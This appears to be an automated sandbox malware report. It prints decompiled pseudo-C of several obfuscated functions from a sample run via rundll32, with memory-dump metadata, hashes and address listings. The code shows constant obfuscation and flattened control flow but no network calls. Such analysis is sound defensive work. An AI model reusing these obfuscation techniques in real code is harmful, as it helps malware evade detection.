                                                                                                                      0x002b6fe3
                                                                                                                      0x002b6fe6
                                                                                                                      0x002b6fec
                                                                                                                      0x002b6ff1
                                                                                                                      0x002b6ff4
                                                                                                                      0x002b6ff6
                                                                                                                      0x002b6ffe
                                                                                                                      0x002b7008
                                                                                                                      0x002b700a
                                                                                                                      0x002b700a
                                                                                                                      0x002b7016
                                                                                                                      0x002b701c
                                                                                                                      0x002b7024

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Mz8$Zjm$z,~
                                                                                                                      • API String ID: 0-2456983437
                                                                                                                      • Opcode ID: 37eaed5dc66e102ab1204a1781f3607055c69a72dfc86eeec90a83ce3bab770d
                                                                                                                      • Instruction ID: 2e9180acea2c578fba6a26c3eadd9417dcba0b3bcb24ba3b77e00080b6a8ce05
                                                                                                                      • Opcode Fuzzy Hash: 37eaed5dc66e102ab1204a1781f3607055c69a72dfc86eeec90a83ce3bab770d
                                                                                                                      • Instruction Fuzzy Hash: 4E410071D1031AABCF08CFA1C98A8EEBBB1FB44354F20815AD821B6250D7B85B51CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002D3672 Relevance: 3.8, Strings: 3, Instructions: 54COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002D3672() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _t69;
				intOrPtr _t71;

				_v16 = 0x1920f4;
				_v16 = _v16 | 0xcc0e70e0;
				_v16 = _v16 + 0xffff67e9;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x00056687;
				_v12 = 0xe97d2f;
				_v12 = _v12 * 5;
				_v12 = _v12 + 0xdb12;
				_v12 = _v12 ^ 0x6ef3d177;
				_v12 = _v12 ^ 0x6a6f4e7b;
				_v8 = 0xee58e5;
				_v8 = _v8 + 0xffff20e4;
				_v8 = _v8 + 0x2db7;
				_v8 = _v8 + 0xffff706b;
				_v8 = _v8 ^ 0x00e27cba;
				_v24 = 0x674fea;
				_v24 = _v24 << 0xd;
				_v24 = _v24 << 0xe;
				_v24 = _v24 + 0xffff2a40;
				_v24 = _v24 ^ 0x4ff265ad;
				_v32 = 0x2c6dbe;
				_v32 = _v32 >> 2;
				_v32 = _v32 ^ 0x000c65e7;
				_v20 = 0xd3ac82;
				_v20 = _v20 * 0x77;
				_v20 = _v20 << 0xc;
				_v20 = _v20 + 0x1c1c;
				_v20 = _v20 ^ 0x53000be4;
				_v28 = 0xd3eaf5;
				_v28 = _v28 ^ 0xd0f82d1e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x57832eb1;
				_t69 =  *0x2d5c9c; // 0x0
				E002CE884(_v16, _v12, _v8,  *((intOrPtr*)(_t69 + 0x50)));
				_t71 =  *0x2d5c9c; // 0x0
				return E002B68DE(_v24, _v32, _v20, _v28,  *((intOrPtr*)(_t71 + 0x58)));
			}












                                                                                                                      0x002d3678
                                                                                                                      0x002d367f
                                                                                                                      0x002d3686
                                                                                                                      0x002d368d
                                                                                                                      0x002d3691
                                                                                                                      0x002d3698
                                                                                                                      0x002d36a3
                                                                                                                      0x002d36a6
                                                                                                                      0x002d36ad
                                                                                                                      0x002d36b4
                                                                                                                      0x002d36bb
                                                                                                                      0x002d36c2
                                                                                                                      0x002d36c9
                                                                                                                      0x002d36d0
                                                                                                                      0x002d36d7
                                                                                                                      0x002d36de
                                                                                                                      0x002d36e5
                                                                                                                      0x002d36e9
                                                                                                                      0x002d36ed
                                                                                                                      0x002d36f4
                                                                                                                      0x002d36fb
                                                                                                                      0x002d3702
                                                                                                                      0x002d3706
                                                                                                                      0x002d370d
                                                                                                                      0x002d3718
                                                                                                                      0x002d371b
                                                                                                                      0x002d371f
                                                                                                                      0x002d3726
                                                                                                                      0x002d372d
                                                                                                                      0x002d3734
                                                                                                                      0x002d373b
                                                                                                                      0x002d373f
                                                                                                                      0x002d3746
                                                                                                                      0x002d3757
                                                                                                                      0x002d375c
                                                                                                                      0x002d377b

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: {Noj$Og$X
                                                                                                                      • API String ID: 0-3024020846
                                                                                                                      • Opcode ID: d5ac16c8f7473eca336e5a2e2737b9489fde11c7efb9e5855e649958d7a0c43f
                                                                                                                      • Instruction ID: 45558618a161b15d11834a600183eb298bdcb382492a3aa0390a605fc7a99e3d
                                                                                                                      • Opcode Fuzzy Hash: d5ac16c8f7473eca336e5a2e2737b9489fde11c7efb9e5855e649958d7a0c43f
                                                                                                                      • Instruction Fuzzy Hash: 8031AFB6C0170AEBCF45DFE4C94A8AEFBB0BB50308F208189D52266261D7B54B59DF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1958600898-0
                                                                                                                      • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                      • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CBE8C Relevance: 2.7, Strings: 2, Instructions: 225COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002CBE8C() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _t217;
				signed int _t223;
				void* _t224;
				void* _t226;
				signed int _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t248;
				void* _t251;
				void* _t256;
				void* _t258;

				_v580 = 0x2596f5;
				asm("stosd");
				_t227 = 0;
				_t229 = 0x1e;
				asm("stosd");
				_t251 = 0x1d7b34c;
				asm("stosd");
				_v624 = 0x892a55;
				_v624 = _v624 | 0xee7fd748;
				_v624 = _v624 ^ 0xeeffffdd;
				_v620 = 0x622f6;
				_v620 = _v620 + 0xbb0c;
				_v620 = _v620 + 0xffff07a8;
				_v620 = _v620 ^ 0x0005e5ab;
				_v632 = 0xb1aa42;
				_v632 = _v632 + 0xffffd879;
				_v632 = _v632 << 7;
				_v632 = _v632 ^ 0x58c15d83;
				_v668 = 0xaf491c;
				_v668 = _v668 | 0xa282f1df;
				_v668 = _v668 * 0x52;
				_v668 = _v668 ^ 0xbc704b9b;
				_v668 = _v668 ^ 0xa02fbf7e;
				_v604 = 0x754ed8;
				_v604 = _v604 / _t229;
				_v604 = _v604 ^ 0x00089259;
				_v636 = 0x96d5f2;
				_v636 = _v636 + 0xd4a1;
				_t230 = 0x30;
				_v636 = _v636 * 0x11;
				_v636 = _v636 ^ 0x0a12807c;
				_v660 = 0x62eec7;
				_v660 = _v660 >> 3;
				_v660 = _v660 / _t230;
				_v660 = _v660 ^ 0xcf464c50;
				_v660 = _v660 ^ 0xcf48190c;
				_v596 = 0xd58755;
				_v596 = _v596 + 0xffffee65;
				_v596 = _v596 ^ 0x00d4794f;
				_v652 = 0xd65add;
				_v652 = _v652 + 0x69d5;
				_v652 = _v652 + 0xffff6cdd;
				_t231 = 0x44;
				_v652 = _v652 * 0x6f;
				_v652 = _v652 ^ 0x5cddf580;
				_v592 = 0x774283;
				_v592 = _v592 / _t231;
				_v592 = _v592 ^ 0x00057017;
				_v608 = 0x66f034;
				_v608 = _v608 * 0x1b;
				_v608 = _v608 ^ 0x0ad54449;
				_v628 = 0x797189;
				_v628 = _v628 | 0xd7c49ce2;
				_v628 = _v628 + 0x4eb;
				_v628 = _v628 ^ 0xd7fc7544;
				_v644 = 0xc6323c;
				_t232 = 0x1a;
				_v644 = _v644 / _t232;
				_v644 = _v644 | 0xc7b29cf4;
				_v644 = _v644 ^ 0xc7b916af;
				_v640 = 0x832b72;
				_v640 = _v640 << 1;
				_v640 = _v640 ^ 0x03109e90;
				_v640 = _v640 ^ 0x021bea31;
				_v600 = 0x7e41eb;
				_v600 = _v600 ^ 0xc4682a67;
				_v600 = _v600 ^ 0xc419d008;
				_v648 = 0x2ae2e2;
				_v648 = _v648 ^ 0xaa2d9f28;
				_v648 = _v648 ^ 0xe0508244;
				_v648 = _v648 + 0xffff0ac8;
				_v648 = _v648 ^ 0x4a517815;
				_v656 = 0x46e590;
				_v656 = _v656 + 0xffffd71a;
				_v656 = _v656 << 0xb;
				_v656 = _v656 | 0x65ccd40d;
				_v656 = _v656 ^ 0x75e69a05;
				_v616 = 0x212081;
				_v616 = _v616 + 0xffff369d;
				_v616 = _v616 << 3;
				_v616 = _v616 ^ 0x010dc67b;
				_v612 = 0xde1992;
				_v612 = _v612 | 0x34451690;
				_v612 = _v612 ^ 0x34df36a3;
				_v664 = 0xb873dc;
				_t233 = 9;
				_t250 = _v612;
				_v664 = _v664 / _t233;
				_v664 = _v664 * 0x16;
				_v664 = _v664 << 6;
				_v664 = _v664 ^ 0x70bc85f2;
				_v672 = 0x9e756b;
				_v672 = _v672 + 0xfffff8a5;
				_v672 = _v672 << 4;
				_v672 = _v672 * 0x17;
				_v672 = _v672 ^ 0xe3b54af9;
				do {
					while(_t251 != 0x1d7b34c) {
						if(_t251 == 0x2564c7d) {
							_t217 = E002CBC49(_t250, _v628, _v644, _v640,  &_v564, _v600);
							_t234 = _v648;
							asm("sbb esi, esi");
							_t251 = ( ~_t217 & 0xf96b950b) + 0xe5304db;
							E002C4DAD(_v648, _v656, _t250, _v616, _v612);
							_t258 = _t258 + 0x24;
							goto L14;
						} else {
							if(_t251 == 0x7be99e6) {
								_t248 = _v672;
								E002CBBB2(_v664, _t248,  &_v588);
								_pop(_t234);
								_t251 = 0xba7f047;
								continue;
							} else {
								if(_t251 == 0xb29cf6f) {
									_t234 = 0;
									_t248 = _v624;
									_t223 = E002CE938(0, _t248, _v660, _v596, _v632, 0, _v652, _v592, 0, _v608, _v620,  &_v524);
									_t250 = _t223;
									_t258 = _t258 + 0x28;
									__eflags = _t223 - 0xffffffff;
									if(__eflags != 0) {
										_t251 = 0x2564c7d;
										continue;
									}
								} else {
									if(_t251 == 0xba7f047) {
										_t224 = E002B9A1E();
										_t256 = _v588 - _v548;
										asm("sbb ecx, [esp+0x94]");
										__eflags = _v584 - _t248;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t256 - _t224;
												if(_t256 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t265 = _t251 - 0xcb5264b;
										if(_t251 != 0xcb5264b) {
											goto L14;
										} else {
											_t248 = _v668;
											_t226 = E002D12A8(_t234, _t248, _t265, _v604, _v636,  &_v524);
											_t258 = _t258 + 0xc;
											if(_t226 != 0) {
												_t251 = 0xb29cf6f;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					_t251 = 0xcb5264b;
					L14:
					__eflags = _t251 - 0xe5304db;
				} while (__eflags != 0);
				goto L20;
			}













































                                                                                                                      0x002cbe92
                                                                                                                      0x002cbea6
                                                                                                                      0x002cbea7
                                                                                                                      0x002cbeab
                                                                                                                      0x002cbeae
                                                                                                                      0x002cbeaf
                                                                                                                      0x002cbeb4
                                                                                                                      0x002cbeb5
                                                                                                                      0x002cbebd
                                                                                                                      0x002cbec5
                                                                                                                      0x002cbecd
                                                                                                                      0x002cbed5
                                                                                                                      0x002cbedd
                                                                                                                      0x002cbee5
                                                                                                                      0x002cbeed
                                                                                                                      0x002cbef5
                                                                                                                      0x002cbefd
                                                                                                                      0x002cbf02
                                                                                                                      0x002cbf0a
                                                                                                                      0x002cbf12
                                                                                                                      0x002cbf1f
                                                                                                                      0x002cbf23
                                                                                                                      0x002cbf2b
                                                                                                                      0x002cbf33
                                                                                                                      0x002cbf43
                                                                                                                      0x002cbf47
                                                                                                                      0x002cbf4f
                                                                                                                      0x002cbf57
                                                                                                                      0x002cbf64
                                                                                                                      0x002cbf67
                                                                                                                      0x002cbf6b
                                                                                                                      0x002cbf73
                                                                                                                      0x002cbf7b
                                                                                                                      0x002cbf88
                                                                                                                      0x002cbf8c
                                                                                                                      0x002cbf94
                                                                                                                      0x002cbf9c
                                                                                                                      0x002cbfa4
                                                                                                                      0x002cbfac
                                                                                                                      0x002cbfb4
                                                                                                                      0x002cbfbc
                                                                                                                      0x002cbfc4
                                                                                                                      0x002cbfd1
                                                                                                                      0x002cbfd4
                                                                                                                      0x002cbfd8
                                                                                                                      0x002cbfe0
                                                                                                                      0x002cbfee
                                                                                                                      0x002cbff2
                                                                                                                      0x002cbffa
                                                                                                                      0x002cc007
                                                                                                                      0x002cc00b
                                                                                                                      0x002cc013
                                                                                                                      0x002cc01b
                                                                                                                      0x002cc023
                                                                                                                      0x002cc02b
                                                                                                                      0x002cc035
                                                                                                                      0x002cc041
                                                                                                                      0x002cc046
                                                                                                                      0x002cc04c
                                                                                                                      0x002cc059
                                                                                                                      0x002cc061
                                                                                                                      0x002cc069
                                                                                                                      0x002cc06d
                                                                                                                      0x002cc075
                                                                                                                      0x002cc07d
                                                                                                                      0x002cc085
                                                                                                                      0x002cc08d
                                                                                                                      0x002cc095
                                                                                                                      0x002cc09d
                                                                                                                      0x002cc0a5
                                                                                                                      0x002cc0ad
                                                                                                                      0x002cc0b5
                                                                                                                      0x002cc0bd
                                                                                                                      0x002cc0c5
                                                                                                                      0x002cc0cd
                                                                                                                      0x002cc0d2
                                                                                                                      0x002cc0da
                                                                                                                      0x002cc0e2
                                                                                                                      0x002cc0ea
                                                                                                                      0x002cc0f2
                                                                                                                      0x002cc0f7
                                                                                                                      0x002cc0ff
                                                                                                                      0x002cc107
                                                                                                                      0x002cc10f
                                                                                                                      0x002cc117
                                                                                                                      0x002cc123
                                                                                                                      0x002cc126
                                                                                                                      0x002cc12a
                                                                                                                      0x002cc133
                                                                                                                      0x002cc137
                                                                                                                      0x002cc13c
                                                                                                                      0x002cc144
                                                                                                                      0x002cc14c
                                                                                                                      0x002cc154
                                                                                                                      0x002cc15e
                                                                                                                      0x002cc162
                                                                                                                      0x002cc16a
                                                                                                                      0x002cc16a
                                                                                                                      0x002cc178
                                                                                                                      0x002cc254
                                                                                                                      0x002cc269
                                                                                                                      0x002cc26d
                                                                                                                      0x002cc276
                                                                                                                      0x002cc27c
                                                                                                                      0x002cc281
                                                                                                                      0x00000000
                                                                                                                      0x002cc17e
                                                                                                                      0x002cc184
                                                                                                                      0x002cc21e
                                                                                                                      0x002cc22b
                                                                                                                      0x002cc230
                                                                                                                      0x002cc231
                                                                                                                      0x00000000
                                                                                                                      0x002cc18a
                                                                                                                      0x002cc190
                                                                                                                      0x002cc1f3
                                                                                                                      0x002cc200
                                                                                                                      0x002cc204
                                                                                                                      0x002cc209
                                                                                                                      0x002cc20b
                                                                                                                      0x002cc20e
                                                                                                                      0x002cc211
                                                                                                                      0x002cc217
                                                                                                                      0x00000000
                                                                                                                      0x002cc217
                                                                                                                      0x002cc192
                                                                                                                      0x002cc198
                                                                                                                      0x002cc299
                                                                                                                      0x002cc2a2
                                                                                                                      0x002cc2ad
                                                                                                                      0x002cc2b4
                                                                                                                      0x002cc2b6
                                                                                                                      0x002cc2b8
                                                                                                                      0x002cc2be
                                                                                                                      0x002cc2c0
                                                                                                                      0x002cc2c0
                                                                                                                      0x002cc2ba
                                                                                                                      0x002cc2ba
                                                                                                                      0x002cc2bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002cc2bc
                                                                                                                      0x002cc2b8
                                                                                                                      0x002cc19e
                                                                                                                      0x002cc19e
                                                                                                                      0x002cc1a4
                                                                                                                      0x00000000
                                                                                                                      0x002cc1aa
                                                                                                                      0x002cc1ba
                                                                                                                      0x002cc1be
                                                                                                                      0x002cc1c3
                                                                                                                      0x002cc1c8
                                                                                                                      0x002cc1ce
                                                                                                                      0x00000000
                                                                                                                      0x002cc1ce
                                                                                                                      0x002cc1c8
                                                                                                                      0x002cc1a4
                                                                                                                      0x002cc198
                                                                                                                      0x002cc190
                                                                                                                      0x002cc184
                                                                                                                      0x002cc2c4
                                                                                                                      0x002cc2cd
                                                                                                                      0x002cc2cd
                                                                                                                      0x002cc286
                                                                                                                      0x002cc28b
                                                                                                                      0x002cc28b
                                                                                                                      0x002cc28b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A~$*
                                                                                                                      • API String ID: 0-472959745
                                                                                                                      • Opcode ID: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction ID: 8b5b60b31a5d7fd32f099a645f24600ad46c331e33fbe04b430454017ba08596
                                                                                                                      • Opcode Fuzzy Hash: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction Fuzzy Hash: C4B172728183819FD758DF65C58991BFBE1BBC4708F104A1DF9EA96220D3B18919CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C41A7 Relevance: 2.7, Strings: 2, Instructions: 215COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002C41A7() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				signed int _t227;
				intOrPtr _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				void* _t233;
				void* _t251;
				signed int* _t255;

				_t255 =  &_v100;
				_v68 = 0xec424;
				_v68 = _v68 | 0x15a76721;
				_v68 = _v68 + 0xba51;
				_v68 = _v68 ^ 0x95b0a177;
				_v32 = 0x9cb342;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0000013b;
				_v72 = 0xae6f3e;
				_v72 = _v72 >> 0xb;
				_v4 = 0;
				_v72 = _v72 * 0x1b;
				_t251 = 0x38ba83c;
				_v72 = _v72 ^ 0x000cf0a1;
				_v40 = 0xd29c0d;
				_v40 = _v40 | 0x0be9fd1c;
				_v40 = _v40 ^ 0x0bf96d7b;
				_v96 = 0x10a61a;
				_v96 = _v96 + 0x673b;
				_v96 = _v96 + 0x336d;
				_v96 = _v96 + 0x2fcb;
				_v96 = _v96 ^ 0x001323ac;
				_v100 = 0x9d3afd;
				_v100 = _v100 << 7;
				_v100 = _v100 << 5;
				_t230 = 0x55;
				_v100 = _v100 / _t230;
				_v100 = _v100 ^ 0x027b67ec;
				_v84 = 0x9cb324;
				_v84 = _v84 + 0xffffbca6;
				_v84 = _v84 + 0xd0f1;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x750d3d14;
				_v88 = 0x3cd70;
				_v88 = _v88 << 0xc;
				_v88 = _v88 + 0x865d;
				_t231 = 0x65;
				_v88 = _v88 / _t231;
				_v88 = _v88 ^ 0x009e1e24;
				_v24 = 0xf6c479;
				_v24 = _v24 ^ 0xf85d6d57;
				_v24 = _v24 ^ 0xf8a5b53e;
				_v92 = 0xa4533c;
				_v92 = _v92 << 8;
				_v92 = _v92 << 0xf;
				_v92 = _v92 ^ 0x907f3c14;
				_v92 = _v92 ^ 0x0e792839;
				_v28 = 0xd04f15;
				_v28 = _v28 * 0x53;
				_v28 = _v28 ^ 0x4380c19a;
				_v36 = 0x6fba0d;
				_v36 = _v36 * 0x6b;
				_v36 = _v36 ^ 0x2ebab037;
				_v20 = 0x23d496;
				_v20 = _v20 ^ 0x4cebd1bd;
				_v20 = _v20 ^ 0x4cc2ad40;
				_v60 = 0x3b5a6d;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x0000f98a;
				_v64 = 0xf0d036;
				_v64 = _v64 + 0xffff53b4;
				_v64 = _v64 ^ 0x894664b9;
				_v64 = _v64 ^ 0x89bf3867;
				_v48 = 0xb08deb;
				_v48 = _v48 | 0x78ca9a10;
				_v48 = _v48 + 0xffff33de;
				_v48 = _v48 ^ 0x78fbc05b;
				_v16 = 0x2da7c5;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00092ddb;
				_v52 = 0x523898;
				_t232 = 0x59;
				_t227 = _v4;
				_v52 = _v52 / _t232;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0x01d201e4;
				_v56 = 0x19cc06;
				_v56 = _v56 + 0xfffff128;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0x6f4387c2;
				_v76 = 0x5278ca;
				_v76 = _v76 << 9;
				_v76 = _v76 ^ 0x8826d706;
				_t233 = 0x5c;
				_v76 = _v76 * 0x5a;
				_v76 = _v76 ^ 0xc3a97567;
				_v12 = 0xdfbc19;
				_v12 = _v12 + 0xffff7584;
				_v12 = _v12 ^ 0x00deabf9;
				_v44 = 0x7b85bc;
				_v44 = _v44 * 9;
				_v44 = _v44 ^ 0xa28277a7;
				_v44 = _v44 ^ 0xa6d14151;
				_v80 = 0xd07577;
				_v80 = _v80 | 0x5043dc19;
				_v80 = _v80 * 0x49;
				_v80 = _v80 * 0x43;
				_v80 = _v80 ^ 0x4228a280;
				while(1) {
					L1:
					_t218 = 0x35852e4;
					do {
						while(_t251 != _t218) {
							if(_t251 == 0x38ba83c) {
								_t251 = 0xe9ff08f;
								continue;
							} else {
								if(_t251 == 0x83f204b) {
									E002B7AF8(_v76, _v12, _v8, _v44, _v80);
								} else {
									if(_t251 == 0xe0715ba) {
										_push(_v100);
										_push(_v96);
										_t238 = _v72;
										_push(0x2b118c);
										__eflags = E002B8786(_v84, _v40, _v72,  &_v8, _v88, E002BAB66(_v72, _v40, __eflags), _v24, _v92, _v72, _t238, _v28, _v32, _v68, _t238, _v36);
										_t251 =  ==  ? 0x35852e4 : 0xdf478d7;
										E002BAE03(_v20, _v60, _v64, _t222);
										_t255 =  &(_t255[0x12]);
										L14:
										_t218 = 0x35852e4;
										_t233 = 0x5c;
										goto L15;
									} else {
										if(_t251 != 0xe9ff08f) {
											goto L15;
										} else {
											_t228 =  *0x2d520c; // 0x0
											_t229 = _t228 + 0x220;
											while( *_t229 != _t233) {
												_t229 = _t229 + 2;
												__eflags = _t229;
											}
											_t227 = _t229 + 2;
											_t251 = 0xe0715ba;
											goto L1;
										}
									}
								}
							}
							L18:
							return _v4;
						}
						_t219 = E002BEFA6(_v48, _v16, _t227, _v52, _v8, _v56);
						_t255 =  &(_t255[4]);
						__eflags = _t219;
						_t251 = 0x83f204b;
						_t196 = _t219 == 0;
						__eflags = _t196;
						_v4 = 0 | _t196;
						goto L14;
						L15:
						__eflags = _t251 - 0xdf478d7;
					} while (__eflags != 0);
					goto L18;
				}
			}







































                                                                                                                      0x002c41a7
                                                                                                                      0x002c41aa
                                                                                                                      0x002c41b4
                                                                                                                      0x002c41be
                                                                                                                      0x002c41c6
                                                                                                                      0x002c41ce
                                                                                                                      0x002c41d6
                                                                                                                      0x002c41db
                                                                                                                      0x002c41e3
                                                                                                                      0x002c41eb
                                                                                                                      0x002c41f0
                                                                                                                      0x002c41fd
                                                                                                                      0x002c4201
                                                                                                                      0x002c4206
                                                                                                                      0x002c420e
                                                                                                                      0x002c4216
                                                                                                                      0x002c421e
                                                                                                                      0x002c4226
                                                                                                                      0x002c422e
                                                                                                                      0x002c4236
                                                                                                                      0x002c423e
                                                                                                                      0x002c4246
                                                                                                                      0x002c424e
                                                                                                                      0x002c4256
                                                                                                                      0x002c425b
                                                                                                                      0x002c4266
                                                                                                                      0x002c426b
                                                                                                                      0x002c4271
                                                                                                                      0x002c4279
                                                                                                                      0x002c4281
                                                                                                                      0x002c4289
                                                                                                                      0x002c4291
                                                                                                                      0x002c4296
                                                                                                                      0x002c429e
                                                                                                                      0x002c42a6
                                                                                                                      0x002c42ab
                                                                                                                      0x002c42b7
                                                                                                                      0x002c42ba
                                                                                                                      0x002c42be
                                                                                                                      0x002c42c6
                                                                                                                      0x002c42ce
                                                                                                                      0x002c42d6
                                                                                                                      0x002c42de
                                                                                                                      0x002c42e6
                                                                                                                      0x002c42eb
                                                                                                                      0x002c42f0
                                                                                                                      0x002c42f8
                                                                                                                      0x002c4300
                                                                                                                      0x002c430d
                                                                                                                      0x002c4311
                                                                                                                      0x002c4319
                                                                                                                      0x002c4326
                                                                                                                      0x002c432a
                                                                                                                      0x002c4332
                                                                                                                      0x002c433a
                                                                                                                      0x002c4342
                                                                                                                      0x002c434a
                                                                                                                      0x002c4352
                                                                                                                      0x002c4357
                                                                                                                      0x002c435c
                                                                                                                      0x002c4364
                                                                                                                      0x002c436c
                                                                                                                      0x002c4374
                                                                                                                      0x002c437c
                                                                                                                      0x002c4384
                                                                                                                      0x002c438c
                                                                                                                      0x002c4394
                                                                                                                      0x002c439e
                                                                                                                      0x002c43ab
                                                                                                                      0x002c43b3
                                                                                                                      0x002c43b8
                                                                                                                      0x002c43c0
                                                                                                                      0x002c43ce
                                                                                                                      0x002c43d1
                                                                                                                      0x002c43d5
                                                                                                                      0x002c43d9
                                                                                                                      0x002c43de
                                                                                                                      0x002c43e6
                                                                                                                      0x002c43ee
                                                                                                                      0x002c43f6
                                                                                                                      0x002c43fb
                                                                                                                      0x002c4403
                                                                                                                      0x002c440b
                                                                                                                      0x002c4410
                                                                                                                      0x002c441f
                                                                                                                      0x002c4420
                                                                                                                      0x002c4424
